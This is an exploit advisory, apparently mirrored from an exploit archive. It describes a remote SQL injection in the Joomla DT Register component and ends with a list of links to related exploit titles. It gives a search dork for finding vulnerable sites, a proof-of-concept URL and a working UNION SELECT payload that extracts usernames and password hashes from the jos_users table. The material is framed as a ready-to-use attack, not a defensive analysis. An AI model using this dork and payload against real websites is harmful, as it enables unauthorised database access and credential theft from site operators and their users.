/---------------------------------------------------------------
/
/ Joomla Component DT Register Remote SQL injection
/
---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkeR]
[*] Dork : inurl:com_DTRegister eventId
[*] Vendor : http://www.dthdevelopment.com/components/dt-register.html
[*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}
[*] Example : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138
[*] Greetings : All friends & muslims HaCkeRs
www.dz-secure.com
----------------------------------------------------------------------------
【Joomla Component DT Register Remote SQL injection Vulnerability】相关文章:
★ Joomla Component EZ Store Remote Blind SQL Injection Exploit
★ Mole Group Real Estate Script
★ phsBlog 0.2 Bypass SQL Injection Filtering Exploit
★ Maian Music 1.0 Insecure Cookie Handling Vulnerability
★ Dreampics Builder (page) Remote SQL Injection Vulnerability
★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
★ Maian Events 2.0 Insecure Cookie Handling Vulnerability
★ MFORUM 0.1a Arbitrary Add-Admin Vulnerability
★ BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability